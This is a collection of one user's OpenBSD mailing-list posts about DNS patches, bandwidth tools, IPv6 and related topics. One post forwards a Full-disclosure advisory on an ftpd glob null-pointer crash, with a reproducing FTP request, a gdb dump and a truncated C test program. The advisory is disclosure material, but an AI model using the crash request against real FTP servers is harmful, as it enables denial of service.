Re: Why I abandoned OpenBSD, and why you should too...
On Fri, Jul 5, 2013 at 12:28 PM, Tito Mari Francis EscaƱo < titomarifran...@gmail.com> wrote: > I was initially thinking this is a troll, but with these quotes: > I vote for another troll... but... this year April Fool was over 3 months ago. -- Thank you. Zamri Besar
Ghost Domain Names: Revoked Yet Still Resolvable
Dear all, It said due to design issues in the DNS protocol. So, indirectly and probably this will affect OpenBSD BIND too? Ghost Domain Names: Revoked Yet Still Resolvable https://www.isc.org/software/bind/advisories/cve-2012-1033 -- Thank you. Zamri Besar
Re: Is it necessary to recompile just to apply a security patch?
On Wed, Jul 30, 2008 at 5:25 AM, Ingo Schwarze <[EMAIL PROTECTED]> wrote: > Hi skogzort, > > Nick Guenther wrote on Tue, Jul 29, 2008 at 01:05:52PM -0400: > > On Tue, Jul 29, 2008 at 11:41 AM, skogzort <[EMAIL PROTECTED]> wrote: > > >> I know nothing/very little about OpenBSD or UNIX. I have been tasked > with > >> updating our OpenBSD DNS server with a security fix (Vulnerability Note > >> VU#800113- Multiple DNS implementations vulnerable to cache poisoning). > > That doesn't sound all too well. You have an OpenBSD server, > but you have nobody knowing more than very little about UNIX? > UNIX is easier to administer than Windows, but some learning > will be required... > > Quite probably, your server might be terribly out of date. > OpenBSD servers ought to be updated at least once a year. > Please look at the first line of the output of dmesg(8). > If the version number is lower than "OpenBSD 4.2", > you should upgrade the base system before applying patches. > In any case, you should establish a process for regular > updates of the server. The best times to update are > in May and November, just after the -stable releases. > In my experience, updating twice a year is easier and > less risky than just once: You get used to it. > Regularly ordering the CDs and just upgrading from CD > is the most convenient way to go. > > If your task is to maintain that server, carefully read > http://www.openbsd.org/cgi-bin/cvsweb/src/etc/root/root.mail?rev=HEAD > Have a quick look at the resources referenced there, > just to get an impression what is available. > The man pages, the FAQ and afterboot(8) are particularly useful. > > >> In order to do this it appears that I have to download the source code > >> re-compile the entire OS. Recompiling the OS seems to involve a lot of > >> steps. > > Don't compile the whole system from source unless you are actively > hacking on the base system (which clearly you aren't) or unless > you want to track -current using a single build for multiple servers. > As others told you, each errata patch contains instructions what > exactly must be rebuilt, and how. > > >> you don"t even have to reboot the server, > > That's indeed true in the present case, yes. > After patching named, you must restart named, > but rebooting would be useless. > > Of course, kernel patches require rebooting - > which applies to Windows machines as well, by the way. ;-) > > > Nick wrote: > > OpenBSD is mostly designed as a monolithic kernel. > > Please stop spreading misleading advice. > This has nothing to do with the kernel. > (Hopefully, skogzort didn't start building kernels yet.) > > Yours, > Ingo > > -- > Ingo Schwarze <[EMAIL PROTECTED]> > usta.de / studis.de system operation > *** Can we get a bind9 kernel module for OpenBSD any time soon? *** > > And I just learn that ISC was releasing -p2 patches for BIND to address stability and performance issues: http://isc.sans.org/diary.html?storyid=4816 -zamri-
Re: MPLS On OpenBGP
On Wed, Aug 6, 2008 at 11:07 PM, Claudio Jeker <[EMAIL PROTECTED]>wrote: > On Wed, Aug 06, 2008 at 03:17:41PM +0100, [EMAIL PROTECTED] wrote: > > Will it be likely possible and feasible to add MPLS feature on OpenBGPd? > > > > Yes. It is neither impossible nor unfeasible. > But don't ask when it will happen unless you like to do the work. > > -- > :wq Claudio > > Or is it possible to port ayame to OpenBSD? Or is it in progress / done? http://www.ayame.org/ -zamri-
Re: Document: OpenBSD for PyMES
On Fri, Aug 8, 2008 at 12:07 PM, Fernando Quintero < [EMAIL PROTECTED]> wrote: > OpenBSD Colombia team, wrote a document about how to configure a OpenBSD > Server for a small company. > Services like dhcp, dns, apache + mysql + php, squid, sarge, nat and > firewall are "touched". > I hope you enjoy it. > Note: Just for people who read spanish. > Note2: it's based on release OpenBSD v4.3 > > URL: http://www.openbsdcolombia.org/?q=node/66 > > See ya!. > > -- > -- > > Fernando Quintero > *Just a nonroot User* > > And google will be trying to help us. :) http://translate.google.com/translate_t http://translate.google.com/translate?u=http%3A%2F%2Fwww.openbsdcolombia.org%2F%3Fq%3Dnode%2F66&hl=en&ie=UTF8&sl=es&tl=en -- Thank you. Zamri Besar
Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning
Good morning, Today, I'm received alert from one of my friends regarding to Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning. http://www.kb.cert.org/vuls/id/800113 I checked the above site, and found that most of the *BSD status are unknown. Is this bug affected OpenBSD default bind dns? I'm don't know either the above bug is similar to this thread or not. http://marc.info/?l=openbsd-misc&m=118539211412877&w=2 -- Thank you. Yours truly, Zamri Besar
Re: Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable to cache poisoning
On Thu, Jul 10, 2008 at 12:14 AM, Mathieu SEGAUD <[EMAIL PROTECTED]> wrote: > Vous m'avez dit ricemment : > >> On Wed, Jul 09, 2008 at 04:52:39PM +0200, Mathieu SEGAUD wrote: >>> Vous m'avez dit ricemment : >>> >>> > Good morning, >>> > >>> > Today, I'm received alert from one of my friends regarding to >>> > Vulnerability Note VU#800113 - Multiple DNS implementations vulnerable >>> > to cache poisoning. >>> > http://www.kb.cert.org/vuls/id/800113 >>> > >>> > I checked the above site, and found that most of the *BSD status are >>> > unknown. Is this bug affected OpenBSD default bind dns? >>> >>> OpenBSD's named is affected. >>> It is a flow in the DNS protocol, which means potentially *all* >>> implementations are affected... >> >> Credit where credit is due: djbdns isn't. > > good to know. thanks. thus "potentially" > >> Without specifics on the issue, I can't tell if OpenBSD's bind is truly >> vulnerable, but it certainly does use a fixed source port. > > Stuart Henderson already answered this question on misc@ (12:10 UTC, > today). Named is vulnerable. The resolver is not :) > > -- > Mathieu > > I'm just finish re-read it right now. Thank you for the input and I agree that at this moment, we will waiting for the latest official update from OpenBSD developers. And probably a minor update for those who are deploying it over Debian. Looks like it is time to patch it. http://www.debian.org/security/2008/dsa-1603 Have a nice day! -zamri-
Re: Identifying Bandwidth Hogs
> On Tue, Jul 8, 2008 at 10:51 PM, David Schulz <[EMAIL PROTECTED]> wrote: >> Hello, >> >> can someone recommend me a good way to quickly determine who on the network >> is using up most the Bandwith, and preferrably, what are the using it for? >> >> I have a 4.3 Machine, which is the Firewall and Router for a Network with >> about 100 Machines. Every once in a while, i see the Traffic picking up >> consideribly when using bwm-ng to check. During normal Operation, i know the >> average Kilobytes per second is around 100kbps , but when bwm-ng shows me >> the traffic is going up 750kbps, and then i know something is up. >> >> Normally then i use something like pftop -s 1 -o rate , and then find out >> who is on top of the list. I wonder if anyone has a better way of finding >> Bandwidth Hogs. On an older FreeBSD System, i simply installed iftop, which >> quickly showed me my top Users. Similar to bwm-ng, but basically showing you >> per IP who is using how much Bandwidth. >> >> Ideally would be a way that not only shows me quickly who is using the most >> Bandwidth, but also, if they are using it for HTTP traffic, or simply >> downloading a large mail or having a Skype Conversation or else. >> >> Excellent would also be a way i can somehow graph all of that, so that even >> when i am not in the office, i can identify people who are doing things they >> shouldnt. I do have an RRD Graph for my main Interface, so i can say for >> example a few hours ago something made the Traffic pick up to 750kbps for 20 >> minutes, but i have no idea who it was. I once had all my protocols and IP's >> labeled, and used pfctl -s labels to parse them into my rrd files, but the >> whole process with collecting and graphing got quite slow. >> >> Also i tried darkstat, but its doesnt do a better job than current bwm-ng >> and pftop. >> >> Thanks for any suggestions, >> David > > Dear Mr David, Two months ago, one of my members was using Hex to deploy a quick solution to analyze his network. You may try to check and see either it is suitable for your environment or not by visiting this website: http://www.rawpacket.org/projects/hex Have a nice day! ;) -zamri-
Re: This is what Linus Torvalds calls openBSD crowd
On Sun, Jul 20, 2008 at 7:42 PM, Duncan Patton a Campbell < [EMAIL PROTECTED]> wrote: > > > > Wanking Sea Monkeys, then: the oceanic analogue of fleas, > at least in the area of genital proportion ;-) > > Dhu > > lol. Looks like someone is selling new stuffs over the net: http://www.cafepress.com/spankymm -zamri-
Re: Memory not detected
On Wed, Jul 23, 2008 at 10:59 PM, John Nietzsche <[EMAIL PROTECTED]> wrote: > Dear OpenBSD user, > > i am installing openbsd 4.3 on a dell poweredge 2900 hardware. It has > 8GB RAM but openbsd seems to detect only 4 GB. > Any suggestions on this matter (i would like to have openbsd detecting 8 > GB)? > > Thanks for your time and cooperation. > > Best regards. > > Are you running amd64 or i386 or else? -- Thank you. Zamri Besar
Re: Is it necessary to recompile just to apply a security patch?
On Tue, Jul 29, 2008 at 11:41 PM, skogzort <[EMAIL PROTECTED]> wrote: > Is it necessary to recompile just to apply a security patch? > > Hello, > I know nothing/very little about OpenBSD or UNIX. I have been tasked with > updating our OpenBSD DNS server with a security fix (Vulnerability Note > VU#800113- Multiple DNS implementations vulnerable to cache poisoning). > > In order to do this it appears that I have to download the source code > re-compile the entire OS. Recompiling the OS seems to involve a lot of > steps. > Before I continue to read through them all, I just want to confirm that it > is > actually necessary to do all of this, simply to apply a security patch: > > Down load the tree.. > Pre load the tree.. > Build the Kernel.. > Build the userland.. > Etc. > > The only thing we use the server for is DNS. I don"t know what Flavor we > are > running, since its on a production server I assume it will be * release or > * > stable, either way from what I"ve read so far it looks like in order to > apply > this security patch I will have to update it to * stable. > > Is it true that the only way to apply this patch is to recompile the entire > OS, and go through all the steps above? I"m only familiar with Windows, > where > you just push a button to apply a security patch and you don"t even have to > reboot the server, so I was thinking that I may be misunderstanding what > I"m > reading. > > Thanks very much for your time and any info > > Kyle > > > The first step is you need to identify which version of OpenBSD that you're running right now, and apply suitable patches to your system. For latest DNS patches, OpenBSD developers were releasing two version of security fixes for 4.2 and 4.3. Just follow the given instruction at the top/head of every patch. http://www.openbsd.org/errata43.html ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.3/common/004_bind.patch http://www.openbsd.org/errata42.html ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.2/common/013_bind.patch And you may check archive, couple of days ago, iirc someone reported they were successfully updating their DNS in 4.1 by using patch from 4.2. And finally, probably you need to read about this too (not sure either the above patches will affect DNS performance in OpenBSD, but someone just reporting it about some issue with Ironport, check archive): http://marc.info/?l=bind-users&m=121726908015389&w=2 -- Thank you. Zamri Besar
[Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
Dear all,
Found this in full-disclosure mailing list.
-- Forwarded message --
From: Kingcope
Date: Fri, Mar 5, 2010 at 11:19 PM
Subject: [Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
To: full-disclos...@lists.grok.org.uk, bugt...@securityfocus.com
FreeBSD ftpd globbing bug - null pointer dereference ?
Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9
Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6
Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
i386
Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its ftpd
when handling globbing requests.
My investigation results in this being a null pointer dereference in
popen.c.
I am not sure if this could be a heap overrun, but I don't think so.
from popen.c:
/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
glob_t gl;
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
[1] if (glob(argv[argc], flags, NULL, &gl))
gargv[gargc++] = strdup(argv[argc]);
[2] else
[3] for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
pop++)
gargv[gargc++] = strdup(*pop);
globfree(&gl);
}
At [1] glob() is called. if theres a long directory (for example "A" x 200)
and a request like described
in "how to repeat this problem" is sent to the ftpd it crashes. My
assumption is because it lands in the
else clause [2], glob doesn't fail but gives back a zeroed out gl structure.
In [3] then there's no check
if pop is null and therefore *pop gets dereferenced which is a null pointer
and the ftpd instance crashes.
Could someone please shed some light into why glob doesn't fail but gives a
zeroed out structure back?
How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+
$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir
W
257
"W"
directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
---snip---
on the other side:
---snip---
0x282261e5 in read () at read.S:3
3 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0805622c in getline ()
(gdb) i r
eax0x0 0
ecx0x0 0
edx0x0 0
ebx0xbfbfd911 -1077946095
esp0xbfbfba70 0xbfbfba70
ebp0xbfbfcc08 0xbfbfcc08
esi0x1 1
edi0xbfbfcbf4 -1077949452
eip0x805622c 0x805622c
eflags 0x10293 66195
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb) x/10i $eip
0x805622c : mov(%edx),%eax
0x805622e : setle %cl
0x8056231 : mov%ecx,%esi
0x8056233 : test %eax,%eax
0x8056235 : je 0x8056281
0x8056237 : test %cl,%cl
0x8056239 : je 0x8056281
0x805623b : mov%edx,%ebx
0x805623d : mov0xee7c(%ebp),%edx
0x8056243 : lea0xee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
eip = 0x805622c in getline; saved eip 0x805047b
called by frame at 0xbfbfcc14
Arglist at 0xbfbfcc08, args:
Locals at 0xbfbfcc08, Previous frame's sp is 0xbfbfcc10
Saved registers:
ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at
0xbfbfcc04,
eip at 0xbfbfcc0c
(gdb)
Testing program:
---snip---
#include
#include
#define MAXUSRARGS 100
#define MAXGLOBARGS 1000
void do_glob() {
glob_t gl;
char **pop;
char buffer[256];
strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
if (glob(buffer, flags, NULL, &gl)) {
printf("GLOB FAILED!\n");
return 0;
}
else
//for (pop = gl.gl_pathv; pop && *pop && 1 <
(MAXGLOBARGS-1);
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
pop++) {
IPv6 - www.openbsd.org
Good morning, Just a question. www.openbsd.org not reachable via IPv6 network? > ping6 -c2 www.kame.net PING6(56=40+8+8 bytes) 2001:e68:2000:3:215:c5ff:fefb:c22f --> 2001:200:dff:fff1:216:3eff:feb1:44d7 16 bytes from 2001:200:dff:fff1:216:3eff:feb1:44d7, icmp_seq=0 hlim=53 time=128.810 ms 16 bytes from 2001:200:dff:fff1:216:3eff:feb1:44d7, icmp_seq=1 hlim=53 time=121.426 ms --- orange.kame.net ping6 statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 121.426/125.118/128.810/3.692 ms > ping6 -c2 www.openbsd.org ping6: hostname nor servname provided, or not known > ping6 -c2 www.freebsd.org PING6(56=40+8+8 bytes) 2001:e68:2000:3:215:c5ff:fefb:c22f --> 2001:4f8:fff6::22 16 bytes from 2001:4f8:fff6::22, icmp_seq=0 hlim=51 time=340.325 ms 16 bytes from 2001:4f8:fff6::22, icmp_seq=1 hlim=51 time=340.765 ms --- red.freebsd.org ping6 statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 340.325/340.545/340.765/0.220 ms > ping6 -c2 www.netbsd.org PING6(56=40+8+8 bytes) 2001:e68:2000:3:215:c5ff:fefb:c22f --> 2001:4f8:3:7:2e0:81ff:fe52:9a6b 16 bytes from 2001:4f8:3:7:2e0:81ff:fe52:9a6b, icmp_seq=0 hlim=51 time=341.447 ms 16 bytes from 2001:4f8:3:7:2e0:81ff:fe52:9a6b, icmp_seq=1 hlim=51 time=343.418 ms --- www.netbsd.org ping6 statistics --- 2 packets transmitted, 2 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 341.447/342.433/343.418/0.986 ms > nslookup -type= www.kame.net 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: www.kame.netcanonical name = orange.kame.net. orange.kame.net has address 2001:200:dff:fff1:216:3eff:feb1:44d7 Authoritative answers can be found from: > nslookup -type= www.openbsd.org 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: *** Can't find www.openbsd.org: No answer Authoritative answers can be found from: openbsd.org origin = zeus.theos.com mail addr = root.theos.com serial = 950512 refresh = 17200 retry = 3600 expire = 360 minimum = 86400 > nslookup -type= www.freebsd.org 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: www.freebsd.org canonical name = red.freebsd.org. red.freebsd.org has address 2001:4f8:fff6::22 Authoritative answers can be found from: > nslookup -type= www.netbsd.org 8.8.8.8 Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: www.netbsd.org has address 2001:4f8:3:7:2e0:81ff:fe52:9a6b Authoritative answers can be found from: -- Thank you. Zamri Besar
The insecurity of OpenBSD
The insecurity of OpenBSD http://allthatiswrong.wordpress.com/2010/01/20/the-insecurity-of-openbsd/ -zamri-
